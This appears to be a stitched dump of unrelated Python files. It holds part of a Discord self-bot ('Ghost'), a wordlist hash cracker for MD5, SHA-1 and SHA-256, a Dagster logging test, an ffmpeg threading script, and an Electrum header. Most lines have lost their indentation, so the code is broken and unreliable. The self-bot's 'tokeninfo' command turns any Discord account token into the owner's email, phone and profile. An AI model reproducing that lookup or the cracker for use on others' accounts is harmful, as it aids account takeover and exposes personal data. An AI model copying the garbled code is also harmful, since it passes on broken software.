embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Deleted {deletedamount} messages")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="purgeself", description="Purge your messages.", usage="purgeself [amount]")
async def purgeself(ctx, amount: int):
history = await ctx.channel.history(limit=amount).flatten()
deletedamount = 0
    for message in history:
        if message.author.id == Ghost.user.id:
            try:
                # Only count messages that were actually deleted.
                await message.delete()
                deletedamount += 1
                await asyncio.sleep(1)
            except:
                pass
if __embedmode__:
embed = discord.Embed(title=f"Deleted {deletedamount} messages", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Deleted {deletedamount} messages")
@Ghost.command(name="lock", description="Lock the command channel.", usage="lock")
async def lock(ctx):
if ctx.author.guild_permissions.manage_channels:
await ctx.channel.set_permissions(ctx.guild.default_role, read_messages=False)
if __embedmode__:
embed = discord.Embed(title=f"Channel Locked", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Channel Locked")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="unlock", description="Unlock the command channel.", usage="unlock")
async def unlock(ctx):
if ctx.author.guild_permissions.manage_channels:
await ctx.channel.set_permissions(ctx.guild.default_role, read_messages=True)
if __embedmode__:
embed = discord.Embed(title=f"Channel Unlocked", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Channel Unlocked")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="lockdown", description="Lock the entire server.", usage="lockdown")
async def lockdown(ctx):
if ctx.author.guild_permissions.manage_guild:
for channel in ctx.guild.channels:
await channel.set_permissions(ctx.guild.default_role, read_messages=False)
channel = await ctx.guild.create_text_channel('lockdown-chat')
if __embedmode__:
embed = discord.Embed(title=f"Server Lockdown Enabled!", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await channel.send(embed=embed, delete_after=__deletetimeout__)
else:
await channel.send("Server Lockdown Enabled!")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="unlockdown", description="Unlock the entire server.", usage="lockdown")
async def unlockdown(ctx):
if ctx.author.guild_permissions.manage_guild:
for channel in ctx.guild.channels:
await channel.set_permissions(ctx.guild.default_role, read_messages=True)
if __embedmode__:
embed = discord.Embed(title=f"Server Lockdown Disabled!", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Server Lockdown Disabled")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="tokeninfo", description="Information about a token.", usage="tokeninfo [token]")
async def tokeninfo(ctx, *, token):
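    # Ask the Discord API who owns this token; a 200 response means the token is valid.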
request = requests.get("https://discord.com/api/users/@me", headers={"Authorization": token})
if request.status_code == 200:
request = request.json()
id = request["id"]
username = request["username"]
discriminator = request["discriminator"]
avatar = avatarUrl(id, request["avatar"])
publicflags = request["public_flags"]
bio = request["bio"]
nitro = ""
if "premium_type" in request:
if request["premium_type"] == 0:
nitro = "None"
elif request["premium_type"] == 1:
nitro = "Classic Nitro"
elif request["premium_type"] == 2:
nitro = "Nitro"
else:
nitro = "None"
email = request["email"]
phone = request["phone"]
if bio == "":
bio = " "
if __embedmode__:
embed = discord.Embed(title=user.name + " token information", color=__embedcolour__)
embed.add_field(name="Token", value="```" + str(token) + "```", inline=False)
embed.add_field(name="Username", value="```" + str(username) + "```")
embed.add_field(name="Email", value="```" + str(email) + "```")
embed.add_field(name="Phone", value="```" + str(phone) + "```")
embed.add_field(name="Discriminator", value="```" + str(discriminator) + "```")
embed.add_field(name="User ID", value="```" + str(id) + "```")
embed.add_field(name="Bio", value="```" + str(bio) + "```")
embed.add_field(name="Nitro", value="```" + str(nitro) + "```")
embed.set_thumbnail(url=avatar)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ {username}'s token Information ]
Token: {token}
Username: {username}
Email: {email}
Phone: {phone}
Discriminator: {discriminator}
User ID: {id}
Bio: {bio}
Nitro: {nitro}
# {__embedfooter__}```{avatar}""")
else:
await ctx.send("Failed to get information about this token. Probably invalid or from a delete user.")
@Ghost.command(name="userinfo", description="Information about the mentioned user.", usage="userinfo [@user]", aliases=["userlookup", "lookupuser"])
async def userinfo(ctx, *, user: discord.User):
if __embedmode__:
embed = discord.Embed(title=user.name + " Information", color=__embedcolour__)
embed.add_field(name="Username", value="```" + str(user.name) + "```")
embed.add_field(name="Discriminator", value="```" + str(user.discriminator) + "```")
embed.add_field(name="User ID", value="```" + str(user.id) + "```")
embed.add_field(name="Created At", value="```" + str(user.created_at.strftime("%d %B, %Y")) + "```")
embed.set_thumbnail(url=avatarUrl(user.id, user.avatar))
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
createdAt = user.created_at.strftime("%d %B, %Y")
await ctx.send(f"""```ini
[ {user.name} Information ]
Username: {user.name}
Discriminator: {user.discriminator}
User ID: {user.id}
Created At: {createdAt}
# {__embedfooter__}```{avatarUrl(user.id, user.avatar)}""")
@Ghost.command(name="serverinfo", description="Information about the command server.", usage="serverinfo (guild id)", aliases=["lookupserver", "guildinfo", "lookupguild", "serverlookup", "guildlookup"])
async def serverinfo(ctx, guild:int=None):
if guild is None:
server = ctx.message.guild
else:
server = await Ghost.fetch_guild(int(guild))
if __embedmode__:
embed = discord.Embed(title=server.name + " Information", color=__embedcolour__)
embed.add_field(name="Name", value="```" + str(server.name) + "```")
embed.add_field(name="Owner", value="```" + str(server.owner) + "```")
try:
embed.add_field(name="Member Count", value="```" + str(server.member_count) + "```")
except:
pass
embed.add_field(name="Server ID", value="```" + str(server.id) + "```")
embed.add_field(name="Created At", value="```" + str(server.created_at.strftime("%d %B, %Y")) + "```")
embed.set_thumbnail(url=str(server.icon))
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
createdAt = server.created_at.strftime("%d %B, %Y")
try:
await ctx.send(f"""```ini
[ {server.name} Information ]
Name: {server.name}
Owner: {server.owner}
Member Count: {server.member_count}
Server ID: {server.id}
Created At: {createdAt}
# {__embedfooter__}```{str(server.icon)}""")
except:
await ctx.send(f"""```ini
[ {server.name} Information ]
Name: {server.name}
Owner: {server.owner}
Server ID: {server.id}
Created At: {createdAt}
# {__embedfooter__}```{str(server.icon)}""")
@Ghost.command(name="avatar", description="Get the mentioned user's avatar.", usage="avatar [@user]", aliases=["pfp", "profilepicture"])
async def avatar(ctx, *, user: discord.User):
if __embedmode__:
embed = discord.Embed(title=user.name + "'s Avatar", color=__embedcolour__)#
embed.set_image(url=avatarUrl(user.id, user.avatar))
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(avatarUrl(user.id, user.avatar))
@Ghost.command(name="servericon", description="Get the server's icon.", usage="servericon", aliases=["guildicon"])
async def servericon(ctx):
if __embedmode__:
embed = discord.Embed(title=ctx.guild.name + "'s Icon", color=__embedcolour__)
embed.set_image(url=iconUrl(ctx.guild.id, ctx.guild.icon))
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(iconUrl(ctx.guild.id, ctx.guild.icon))
@Ghost.command(name="afkmode", description="Toggle afk mode.", usage="afkmode")
async def afkmode(ctx):
global afkMode
afkMode = not afkMode
cfg = Config.getConfig()
cfg["afkmode"]["enabled"] = afkMode
Config.saveConfig(cfg)
if afkMode:
await ctx.send("Afk mode has been enabled.")
else:
await ctx.send("Afk mode has been disabled.")
@Ghost.command(name="settings", description="The bot's settings.", usage="settings")
async def settings(ctx):
totalguilds = len(Ghost.guilds)
totalcommands = len(Ghost.commands) + len(ccmd)
uptime = int(round(time.time() - botStartTime))
uptimeText = str(timedelta(seconds=uptime))
delta_uptime = datetime.now() - Ghost.launch_time
hours, remainder = divmod(int(delta_uptime.total_seconds()), 3600)
minutes, seconds = divmod(remainder, 60)
days, hours = divmod(hours, 24)
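# logins.txt stores the login counter as base64-encoded text; decode it back to plain ASCII before showing it in the settings output.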
logins = open('data/logins.txt', 'r')
logindata = logins.read()
base64_message = logindata
base64_bytes = base64_message.encode('ascii')
message_bytes = base64.b64decode(base64_bytes)
logindata_decoded = message_bytes.decode('ascii')
if __embedmode__:
embed = discord.Embed(title=f"Settings", color=__embedcolour__)
embed.add_field(name="Commands", value=f"```{totalcommands}```")
embed.add_field(name="Logins", value=f"```{logindata_decoded}```")
embed.add_field(name="Version", value=f"```{version}```")
embed.add_field(name="Prefix", value=f"```{Ghost.command_prefix}```")
embed.add_field(name="Servers", value=f"```{totalguilds}```")
#embed.add_field(name="Uptime", value=f"```{days}d, {hours}h, {minutes}m, {seconds}s```")
embed.add_field(name="Uptime", value=f"```{uptimeText}```")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Settings ]
Commands: {totalcommands}
Logins: {logindata_decoded}
Version: {version}
Prefix: {Ghost.command_prefix}
Servers: {totalguilds}
Uptime: {days}d, {hours}h, {minutes}m, {seconds}s
# {__embedfooter__}```""", delete_after=__deletetimeout__)
'''@Ghost.command(name="snipers", description="All snipers.", usage="snipers")
async def snipers(ctx):
if __nitrosniper__ == True:
nitro = "Enabled"
else:
nitro = "Disabled"
if __privnotesniper__ == True:
privnote = "Enabled"
else:
privnote = "Disabled"
if __giveawaysniper__ == True:
giveaway = "Enabled"
else:
giveaway = "Disabled"
try:
embed = discord.Embed(title=f"Snipers", color=__embedcolour__)
embed.add_field(name="Nitro", value=f"```{nitro}```")
embed.add_field(name="Privnote", value=f"```{privnote}```")
embed.add_field(name="Giveaway", value=f"```{giveaway}```")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Snipers ]
Nitro: {nitro}
Privnote: {privnote}
Giveaway: {giveaway}
# {__embedfooter__}```""", delete_after=__deletetimeout__)'''
@Ghost.command(name="playing", description="Set a playing status.", usage="playing [text]")
async def playing(ctx, *, text):
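# Read the account's current online status from the settings endpoint first so that setting a new activity does not override it; fall back to 'online' if the request fails.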
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
await Ghost.change_presence(activity=discord.Game(text), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Playing Status", description=f"Status changed to: Playing {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Playing Status ]
Status changed to: Playing {text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="streaming", description="Set a streaming status.", usage="streaming [text]")
async def streaming(ctx, url, *, text):
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
await Ghost.change_presence(activity=discord.Activity(type=1, name=f"{text}", url=f"{url}"), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Streaming Status", description=f"Status changed to: Streaming {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Streaming Status ]
Status changed to: Streaming {text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="listening", description="Set a listening to status.", usage="listening [text]")
async def listening(ctx, *, text):
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
await Ghost.change_presence(activity=discord.Activity(type=2, name=f"{text}"), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Listening Status", description=f"Status changed to: Listening to {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Listening Status ]
Status changed to: Listening to {text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="watching", description="Set a watching status.", usage="watching [text]")
async def watching(ctx, *, text):
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
await Ghost.change_presence(activity=discord.Activity(type=3, name=f"{text}"), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Watching Status", description=f"Status changed to: Watching {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Watching Status ]
Status changed to: Watching {text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="clearstatus", description="Clear your status.", usage="clearstatus")
async def clearstatus(ctx):
await Ghost.change_presence(activity=None)
try:
embed = discord.Embed(title=f"Status Cleared", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send("Status Cleared")
@Ghost.command(name="nickname", description="Set your nickname to anything.", usage="nickname [text]")
async def nickname(ctx, *, text):
await ctx.author.edit(nick=text)
if __embedmode__:
embed = discord.Embed(title=f"Nickname changed to {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Nickname changed to {text}")
print(fg.cWhite + "")
@Ghost.command(name="clearnickname", description="Clear your nickname.", usage="clearnickname")
async def clearnickname(ctx):
await ctx.author.edit(nick="")
if __embedmode__:
embed = discord.Embed(title=f"Nickname cleared", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Nickname cleared")
Ghost.run(__token__)
except Exception as e:
if "improper token" in str(e).lower():
print("The Discord token that Ghost has been given to use is no longer working or is invalid.")
print("Please put a new token in to the config (config.json).")
else:
print(e)
logging.exception(str(e))
if os.name == "nt":
os.system("pause")
if os.name == "posix":
input("Press enter to close . . .")
|
hashcracker.py
|
import json
import hashlib
import os
import sys
import time
import threading
import multiprocessing
md, sh1, sh256 = [], [], []
unknown_hashtypes = []
with open("config.json") as c:
config = json.load(c)
wlpath = config["wordlistpath"]
hashpath = config["hashlistpath"]
if not os.path.exists(wlpath) or not os.path.exists(hashpath):
sys.exit("\nError, please check wordlist or hashlist path in config.json\n")
with open(hashpath) as h:
hashes = h.read().splitlines()
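# The hash algorithm is inferred from the hex digest length: 32 characters = MD5, 40 = SHA-1, 64 = SHA-256.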
def makehash(word, mode):
word = word.encode("utf-8")
if mode == 32:
m = hashlib.md5()
m.update(word)
elif mode == 40:
m = hashlib.sha1()
m.update(word)
elif mode == 64:
m = hashlib.sha256()
m.update(word)
return m.hexdigest()
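# Walk the wordlist once, hash every candidate word with the mode implied by the first hash's length, and report matches with the elapsed time; hashes that survive the whole wordlist are pushed onto the shared 'unsolved' list.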
def crackhash(hshlist, wlpath, proclist):
start = time.time()
mode = len(hshlist[0])
with open(wlpath, encoding="utf-8", errors="ignore") as f:
for word in f:
word = word.rstrip()
curhash = makehash(word, mode)
if curhash in hshlist:
print(f"{curhash[0:15]}... : {word} ({round(time.time()-start, 2)}s)")
hshlist.remove(curhash)
if len(hshlist) != 0:
for hsh in hshlist:
proclist.append(hsh)
for hsh in hashes:
mode = len(hsh)
hashtypes = {
32: md,
40: sh1,
64: sh256
}
if mode != 32 and mode != 40 and mode != 64:
unknown_hashtypes.append(hsh)
else:
hashtypes[mode].append(hsh)
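# Spawn one worker process per hash type actually present in the hash list, so MD5, SHA-1 and SHA-256 candidates are cracked in parallel.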
if __name__ == "__main__":
with multiprocessing.Manager() as manager:
px = []
unsolved_hashes = manager.list()
if len(md) != 0:
p = multiprocessing.Process(target=crackhash, args=(md, wlpath, unsolved_hashes,))
px.append(p)
if len(sh1) != 0:
p = multiprocessing.Process(target=crackhash, args=(sh1, wlpath, unsolved_hashes,))
px.append(p)
if len(sh256) != 0:
p = multiprocessing.Process(target=crackhash, args=(sh256, wlpath, unsolved_hashes,))
px.append(p)
for p in px:
p.start()
for p in px:
p.join()
if len(unsolved_hashes) != 0:
print("\n--UNSOLVED HASHES--")
for us in unsolved_hashes:
print(us)
if len(unknown_hashtypes) != 0:
print("\n--UNKNOWN HASH TYPES--")
for uk in unknown_hashtypes:
print(uk)
|
test_stdout.py
|
from __future__ import print_function
import os
import random
import string
import sys
import time
import pytest
from dagster import (
DagsterEventType,
ExecutionTargetHandle,
InputDefinition,
ModeDefinition,
execute_pipeline,
pipeline,
resource,
solid,
)
from dagster.core.execution.compute_logs import should_disable_io_stream_redirect
from dagster.core.instance import DagsterInstance
from dagster.core.storage.compute_log_manager import ComputeIOType
from dagster.utils import get_multiprocessing_context
HELLO_SOLID = 'HELLO SOLID'
HELLO_RESOURCE = 'HELLO RESOURCE'
SEPARATOR = os.linesep if (os.name == 'nt' and sys.version_info < (3,)) else '\n'
@resource
def resource_a(_):
print(HELLO_RESOURCE)
return 'A'
@solid
def spawn(_):
return 1
@solid(input_defs=[InputDefinition('num', int)], required_resource_keys={'a'})
def spew(_, num):
print(HELLO_SOLID)
return num
def define_pipeline():
@pipeline(mode_defs=[ModeDefinition(resource_defs={'a': resource_a})])
def spew_pipeline():
spew(spew(spawn()))
return spew_pipeline
def normalize_file_content(s):
return '\n'.join([line for line in s.replace(os.linesep, '\n').split('\n') if line])
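# normalize_file_content collapses platform-specific line endings and drops empty lines so captured log files compare equal across operating systems.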
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk():
spew_pipeline = define_pipeline()
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith('spawn'):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, 'r') as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk_multiprocess():
spew_pipeline = ExecutionTargetHandle.for_pipeline_python_file(
__file__, 'define_pipeline'
).build_pipeline_definition()
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
result = execute_pipeline(
spew_pipeline,
environment_dict={'storage': {'filesystem': {}}, 'execution': {'multiprocess': {}}},
instance=instance,
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith('spawn'):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, 'r') as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager():
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
spew_pipeline = define_pipeline()
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 3
step_key = 'spew.compute'
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
stderr = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDERR)
cleaned_logs = stderr.data.replace('\x1b[34m', '').replace('\x1b[0m', '')
assert 'dagster - DEBUG - spew_pipeline - ' in cleaned_logs
bad_logs = manager.read_logs_file('not_a_run_id', step_key, ComputeIOType.STDOUT)
assert bad_logs.data is None
assert not manager.is_watch_completed('not_a_run_id', step_key)
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager_subscriptions():
instance = DagsterInstance.local_temp()
spew_pipeline = define_pipeline()
step_key = 'spew.compute'
result = execute_pipeline(spew_pipeline, instance=instance)
stdout_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDOUT
)
stderr_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDERR
)
stdout = []
stdout_observable.subscribe(stdout.append)
stderr = []
stderr_observable.subscribe(stderr.append)
assert len(stdout) == 1
assert stdout[0].data.startswith(HELLO_SOLID)
assert stdout[0].cursor in [12, 13]
assert len(stderr) == 1
assert stderr[0].cursor == len(stderr[0].data)
assert stderr[0].cursor > 400
def gen_solid_name(length):
return ''.join(random.choice(string.ascii_lowercase) for x in range(length))
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_long_solid_names():
solid_name = gen_solid_name(300)
@pipeline(mode_defs=[ModeDefinition(resource_defs={'a': resource_a})])
def long_pipeline():
spew.alias(name=solid_name)()
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
result = execute_pipeline(
long_pipeline,
instance=instance,
environment_dict={'solids': {solid_name: {'inputs': {'num': 1}}}},
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 1
step_key = compute_steps[0]
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
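# execute_inner/inner_step emulate per-step compute logging: every print happens inside a compute_log_manager.watch(...) scope keyed by step, so each step's stdout is captured into its own log file.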
def execute_inner(step_key, pipeline_run, instance_ref):
instance = DagsterInstance.from_ref(instance_ref)
inner_step(instance, pipeline_run, step_key)
def inner_step(instance, pipeline_run, step_key):
with instance.compute_log_manager.watch(pipeline_run, step_key=step_key):
time.sleep(0.1)
print(step_key, 'inner 1')
print(step_key, 'inner 2')
print(step_key, 'inner 3')
time.sleep(0.1)
def expected_inner_output(step_key):
return '\n'.join(
["{step_key} inner {num}".format(step_key=step_key, num=i + 1) for i in range(3)]
)
def expected_outer_prefix():
return '\n'.join(["outer {num}".format(num=i + 1) for i in range(3)])
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_single():
instance = DagsterInstance.local_temp()
pipeline_name = 'foo_pipeline'
pipeline_run = instance.create_run(pipeline_name=pipeline_name, pipeline_snapshot=None)
step_keys = ['A', 'B', 'C']
with instance.compute_log_manager.watch(pipeline_run):
print('outer 1')
print('outer 2')
print('outer 3')
for step_key in step_keys:
inner_step(instance, pipeline_run, step_key)
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_multi():
instance = DagsterInstance.local_temp()
pipeline_name = 'foo_pipeline'
pipeline_run = instance.create_run(pipeline_name=pipeline_name, pipeline_snapshot=None)
context = get_multiprocessing_context()
step_keys = ['A', 'B', 'C']
with instance.compute_log_manager.watch(pipeline_run):
print('outer 1')
print('outer 2')
print('outer 3')
for step_key in step_keys:
process = context.Process(
target=execute_inner, args=(step_key, pipeline_run, instance.get_ref())
)
process.start()
process.join()
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
# The way that the multiprocess compute-logging interacts with pytest (which stubs out the
# sys.stdout fileno) makes this difficult to test. The pytest-captured stdout only captures
# the stdout from the outer process, not also the inner process
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
|
ffmpeg.py
|
import queue
import threading
import os
import compute
vids_path = './videos'
out = './processed'
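# Fill a queue with every video path and hand it to a small pool of worker threads running compute.process (an external helper assumed to consume paths from the queue).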
def main():
q = queue.Queue()
directory = os.listdir(vids_path)
for file in directory:
q.put(vids_path+"/"+file)
workers = []
for i in range(3):
    # Start all workers first; joining inside the loop would run them one at a time.
    worker = threading.Thread(target=compute.process, args=(q, vids_path))
    worker.start()
    workers.append(worker)
for worker in workers:
    worker.join()
if __name__ == "__main__":
main()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
